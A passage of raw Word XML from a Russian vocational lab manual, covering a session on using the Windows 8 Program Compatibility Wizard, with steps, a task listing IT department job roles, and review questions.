          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00E50AAC">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 40</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Освоение техники управления мобильными продажами (с корпоративного персонального компьютера (КПК), ноутбука или удаленный доступ) в CRM-системе</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="438" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="0091628F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidTr="00AD2C0E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="003C7D91" w:rsidP="00E50AAC">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Всго п/з</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="438" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00B56D78" w:rsidP="003C7D91">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00582154" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> =SUM(ABOVE) </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582154" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="003C7D91" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AD2C0E" w:rsidRPr="00617AC0" w:rsidRDefault="00AD2C0E" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00607C3B" w:rsidRDefault="00434232" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00616342" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="0094432D">
      <w:pPr>
        <w:pStyle w:val="1100"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc26278720"/>
      <w:bookmarkStart w:id="18" w:name="_Toc507786847"/>
      <w:bookmarkStart w:id="19" w:name="_Toc507788238"/>
      <w:bookmarkStart w:id="20" w:name="_Toc507788508"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Практическое занятие № </w:t>
      </w:r>
      <w:r w:rsidR="00616342" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Выявление </w:t>
      </w:r>
      <w:r w:rsidR="00616342" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">проблем совместимости программного обеспечения системными средствами </w:t>
      </w:r>
      <w:r w:rsidR="00912E73" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="00616342" w:rsidRPr="00617AC0" w:rsidRDefault="00616342" w:rsidP="00616342">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков выявления программной совместимости профессионального программного обеспечения с помощью Мастера совместимости программ и Администратора совместимости операционной системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00616342" w:rsidRPr="00617AC0" w:rsidRDefault="00616342" w:rsidP="00616342">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>персональный компьютер, базовое программное обеспечении, ресурсы сети интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00616342" w:rsidRPr="00617AC0" w:rsidRDefault="00616342" w:rsidP="00616342">
      <w:pPr>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="00616342">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание </w:t>
      </w:r>
      <w:r w:rsidR="00616342" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Выявление проблем совместимости программного обеспечения системными средствами</w:t>
      </w:r>
      <w:r w:rsidR="00616342" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD6D41" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>с помощью Мастера совместимости программ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="00616342">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00DD6D41" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ниже будет рассмотрена работа с мастером настройки совместимости приложений в ОС Windows 8. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Для вызова мастера необходимо вызвать контекстное меню исполняемого файла (или ярлыка запуска программы). Выбрать пункт </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Исправление неполадок совместимости</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Откроется инструмент, позволяющий в автоматическом режиме настроить совместимость устаревшего приложения с новой системой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. В данном окне необходимо выбрать пункт </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диагностика программы</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> для перехода в режим диагностики появившихся проблем. В новом окне отобразится группа флажков, при помощи которых необходимо конкретизировать возникшие проблемы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3. После нажатия кнопки </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> появится следующий уточняющий вопрос, который напрямую зависит от выбора флажков в предыдущем окне. Например, система может попросить указать версию Windows, в которой программа работала корректно. В некоторых случаях на следующем этапе могут появиться дополнительные уточняющие вопросы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4. После получения ответов на все заданные вопросы, мастер автоматически установит параметры, необходимые для корректной работы приложения. После этого в окне отобразится кнопка </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проверить программу</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Нажатие на данную кнопку запускает программу с выставленными параметрами совместимости. После проверки работоспособности приложения, ее можно закрыть. В окне мастера настройки необходимо нажать </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, чтобы перейти к завершающему этапу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. На данном этапе программа предлагает три ссылки: сохранение результатов, установка других параметров совместимости и поиск решения в интернете. Первый вариант необходимо использовать, если программа начала работать и отображаться корректно. В этом случае новые настройки сохраняются и используются при каждом запуске программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вторая ссылка запускает мастер настройки с самого начала. Это позволяет попробовать указать другие параметры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Третий вариант можно использовать, если настройка совместимости не дала положительных результатов. В этом случае сведения о проблеме отправляются специалистам Microsoft. Это поможет исправить проблему в последующих версиях Windows, однако в текущий момент проблема решена не будет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Разработать систему мотивирования сотрудников отдела.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Список должностей:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Руководящие должности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Директор / Руководитель отдела информационных технологий (IT Director).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Специалисты</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Системный администратор (LAN Administrator).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Специалист</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>по</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>автоматизации</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>бизнес</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>процессов</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Business-process automation Specialist)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Программист</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Software developer)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Специалист по поддержке пользователей (User Support Specialist)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Требования к отчету: Отчет, в котором содержатся результаты работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое программная совместимость?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Что такое аппаратная совместимость?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Как запустить мастер совместимости?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="00616342">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc507786848"/>
      <w:bookmarkStart w:id="22" w:name="_Toc507788239"/>
